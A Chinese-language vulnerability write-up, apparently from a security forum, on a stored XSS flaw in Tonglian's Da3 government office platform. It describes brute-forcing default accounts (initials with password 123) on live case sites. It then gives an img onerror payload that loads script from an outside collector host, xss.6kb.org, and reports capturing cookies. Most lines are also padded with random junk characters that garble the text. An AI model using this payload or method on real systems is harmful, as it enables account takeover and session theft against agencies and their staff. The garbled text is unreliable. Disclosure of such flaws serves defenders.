5 s1 Q4 G" `* z& `
% k7 H7 `2 c8 H/ I2 m- | 同联Da3协同办公平台后台通用储存型xss漏洞5 w7 X3 j7 E2 I' G- P. r9 @& ~
! {+ W+ ?) y& V2 v$ Q' Z# Z; r
8 u' A# f/ p5 N
平台简介:' O4 h+ U8 P) [2 B% K) Q* I
0 ]3 b3 T% B0 e B 4 o+ [0 ]6 x- \) ^& y0 v% V
: ]* J) f5 w) D9 Q
' }0 F: T% l; D f- a3 a8 Q
M2 d, h3 v s1 b& }/ Y7 n6 \ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
4 r) s: _. v5 i/ z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
7 P# A) h& |& R: Y2 J" S
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!- h. H' z! N' ]) {! I. B- \
$ [7 [% |$ G! e+ T$ F8 u : t7 z' \; P3 V, z/ P( ]( n2 a8 V
+ V% u; \ e6 ^6 s9 c
( R, P! | d; u3 L9 O E3 B
; ?" h; D, q) L1 F& x
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:6 Q9 S P4 O- _3 {, M1 ^
3 b4 U- V5 I J1 K7 ~% w & @; @! N X. K4 p; L2 l$ |
% r0 m+ k2 r, d$ P
1 _$ ^/ I4 M+ _0 ^, C( `3 A
. F) m& h* `" c f http://1.1.1.1:7197/cap-aco/#(案例2-)+ i% J1 a& W" J. D* n
! K6 s# O& ?' @+ z
' |9 g* T d# C4 x; v+ |( @+ r& v http://www.XXOO.com (案例1-官网网站)
8 A) l% Z( m/ @1 o, @; j. g7 D
- I$ Y, c1 r7 M' |: {6 j- J- g' c X
. U3 w( A; U2 F2 _4 m! N. K" ^
漏洞详情:8 k6 i8 i" v: @3 T
0 p2 s( `* T+ M1 |' C' M
" n9 N, x5 N* L7 e& y3 B, l
案例一、
: j& q- {& F8 Y4 e3 r& r3 N& E& Y
$ f% }/ F! @- G- T) ?
4 s' d/ y1 c) ^+ U" L" O% t
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试- Z# g2 k5 Q% V _/ U6 U! y) c
8 ~) S( ~1 m! `9 u! |' A$ g: \5 E 9 J1 o; t/ d5 i- F$ A
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:- s: E2 ?8 q/ A* U+ ^! B' j
, v; z$ z4 T9 i6 y _1 d% d8 v
( G) j. D! P5 M. t! g/ p % @+ T6 j7 i3 O L0 L
( x* d0 x: `4 g. h6 x. s- S
& o9 ?: L5 j/ K" A
- k; X5 @9 s( f! C+ y5 F
; \7 X# m" J. `3 z( s: }( ^' u# e
! I) ?4 ^9 \$ d status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ' R. I( c! @+ l0 Q, g B8 ~" R
! L) Y% i+ f9 U/ k# l5 u
/ f" T+ X4 x/ s, ]% N ' d- \, Z1 c' X3 `9 G. ~
% U1 `6 @7 T% n # u; l( s, X* r; ? _
8 a6 z( [( C" ]* [8 ?" W9 i/ u
8 h9 [, W! V+ S6 g
. b* c3 D P4 h* `5 |5 Y
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 5 r3 `3 A* f* i* _6 z4 K/ e9 f: K
" [+ p- Q9 @5 [! V5 K* e! O - O8 [0 c; d2 b: }* b6 a @
# n. N' L3 `4 n# i+ N! y
( d1 d( ?# W/ O/ _8 ? ' \( u, S2 t Y; r* L a
<img src=x
; K8 ?0 W8 z5 u3 B1 qonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: ' W: \1 W8 z7 w: s t5 `& {' R0 Y: D! W
' S: |7 ~) S6 n
6 N# f/ y. S+ J ]- \! @) U
* l" b0 @) Z- E; J; ^
: F, k6 m+ V% O
( V4 I2 h! `0 N/ \ [' S' k; L 然后发送,接收cookie如图:
- U1 @5 J; g8 _
+ {8 a7 E9 C, f; D: k% O) o
4 g4 t3 v4 R" x1 W a3 O
$ [$ ]- ~) ^6 B' U
A9 t& }6 ^0 s% g9 L9 S
1 u0 b# t" r4 k0 q+ U- R
3 n+ N1 J' B% J1 K, D# j
# i- h8 V9 M( z K9 u! I: h. D 3 v& Z, j" |0 g4 o0 l
- e5 ^: c9 W! [! ~( x) |* e# x
) F2 [% ? A s8 x# j( b
( Y3 m) m! _% F% u/ ~
8 o+ b0 D4 X# S4 E( d0 [
1 F5 E/ L: O& F9 j9 D3 B # N- I1 c1 B: f: V' F$ Z
4 X% O$ R8 I D2 q# g+ J
8 y1 P, g4 L% G5 o' p: m
; D1 ]0 y/ ?' F4 g) D% N3 y7 v& ~
: R$ I: O" |% X& G
, V# U7 V) |& v/ ` * @/ f5 z- s* Q
, Y) L; M" M M5 M& h [' x
' g. x# ]; h1 T" Y8 u( B) P
7 {: @+ f) q5 K4 z+ y 案例2、
$ T& o- d8 V. q) R& M3 ~
' \' O* J. c2 y' [) s! W( M
3 n7 _, o7 F# x3 |. D+ o 前面步骤都一样,下面看效果图:
+ e( O2 h' s h' ?
1 X- j ^8 K7 e. T1 a. y
+ R2 @! n/ r' g
8 K' x. r% ]& f( R. ]/ [
) z0 i* u- ?# h* f# i8 T0 n
. t5 \% w4 N& a& u# S& M0 w
: y6 |- \& K4 o* n7 \; l3 k. r
. {3 ^& Q/ k( I+ D7 H
! t( n- [# l6 H2 L) ^
+ Q. U/ i7 P: c
$ J8 u9 E5 i7 d$ t g
2 \* F: Y# N4 ^9 n: R5 a! }' Q3 B
' M4 w3 q G, ~1 L
7 g' L) d3 d+ c+ `5 ?# N 6 m+ [. V' E2 J# c" }7 F
* q0 R0 `' S2 K1 w
- j' L1 U" n6 J$ s% T+ A7 T" b
/ F& Z# Q0 o A, x8 C5 b9 }
4 K6 ]2 N1 i) q9 }
* i- w# V6 ?0 B5 J1 C& v- p z
8 }' l% G& P0 l% M! [. b
6 E N- x6 O; h3 _! g( D' }
$ `1 d# m3 o" u) k5 q
1 ?' p" w$ j4 D; W7 l
/ x! h3 F' j: `- a
, z: w1 d* z" F5 k. I5 S* ]9 T
" ~$ N N0 `$ W; t6 k 4 [: W. v8 j1 t
- y5 g& \/ N: \5 y: ~$ O